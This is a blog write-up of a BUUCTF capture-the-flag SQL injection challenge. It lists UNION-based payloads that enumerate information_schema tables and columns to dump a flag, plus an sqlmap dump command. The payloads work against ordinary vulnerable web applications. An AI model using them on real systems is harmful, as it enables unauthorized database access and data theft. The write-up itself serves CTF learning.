Fading Coder

One Final Commit for the Last Sprint

Home > Tools > Content

SQL Injection CTF Challenge: Extracting Flag from Vulnerable Parameter

Tools 1

Challenge Overview

Source: BUUCTF Platform

Objective: Retrieve the flag value.

Approach

The challenge presents a web page with minimal visible content. The URL contains a query parameter ?id=1, indicating this is a standard SQL injection vulnerability.

Determining Injection Type

First, test whether the injection point accepts numeric payloads:

?id=1 and 1=2

If this were a numeric injection, the backend query would become:

SELECT * FROM users WHERE id=1 AND 1=2

This should produce an error, but the page remains unchanged. Therefore, this is not a numeric injecsion.

Identifying Closure Mechanism

Since it is not numeric, it must be character-based. Test single-quote closure:

?id=1' AND 1=2--+

If single-quote closure applies, the backend constructs:

SELECT * FROM users WHERE id='1' AND 1=2 --+'

The page displays nothing, confirming single-quote closure.

Enumerating Columns

With closure identified, use ORDER BY to determine the number of columns:

?id=1' ORDER BY 3--+

Column count 3 returns normally. Testing count 4:

?id=1' ORDER BY 4--+

The page behavior changes, confirming exactly 3 columns exist.

Locating Display Columns

Use a UNION-based payload to identify which columns render output:

?id=-1' UNION SELECT 1,2,3--+

The results reveal which positions reflect data on the page.

Extracting Database Contents

Query available tables in the current database:

?id=-1' UNION SELECT 1,database(),group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()--+

Two tables appear. One named fl4g looks promising for containing the flag.

Retrieving Flag Data

Query columns within the fl4g table:

?id=-1' UNION SELECT 1,database(),group_concat(column_name) FROM information_schema.columns WHERE table_name='fl4g'--+

A column named fllllag contains the target data.

Final Extraction

?id=-1' UNION SELECT 1,database(),group_concat(fllllag) FROM fl4g--+

The flag value displays on the page. Submit to verify.

Automated Alternative

Sqlmap handles this automatical:

sqlmap -u http://target-url/index.php?id=1 -D note -T fl4g -C fllllag --dump --batch
Tags: CTFSQL InjectionWeb SecuritysqlVulnerability Assessment
Back to List

Prev: Understanding CSS Attribute and Pseudo-class Selectors

Next: Getting Started with ArkTS for HarmonyOS Development

Related Articles

Efficient Usage of HTTP Client in IntelliJ IDEA

IntelliJ IDEA incorporates a versatile HTTP client tool, enabling developres to interact with RESTful services and APIs effectively with in the editor. This functionality streamlines workflows, replac...

Installing CocoaPods on macOS Catalina (10.15) Using a User-Managed Ruby

System Ruby on macOS 10.15 frequently fails to build native gems required by CocoaPods (for example, ffi), leading to errors like: ERROR: Failed to build gem native extension checking for ffi.h... no...

Resolve PhpStorm "Interpreter is not specified or invalid" on WAMP (Windows)

Symptom PhpStorm displays: "Interpreter is not specified or invalid. Press ‘Fix’ to edit your project configuration." This occurs when the IDE cannot locate a valid PHP CLI executable or when the debu...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top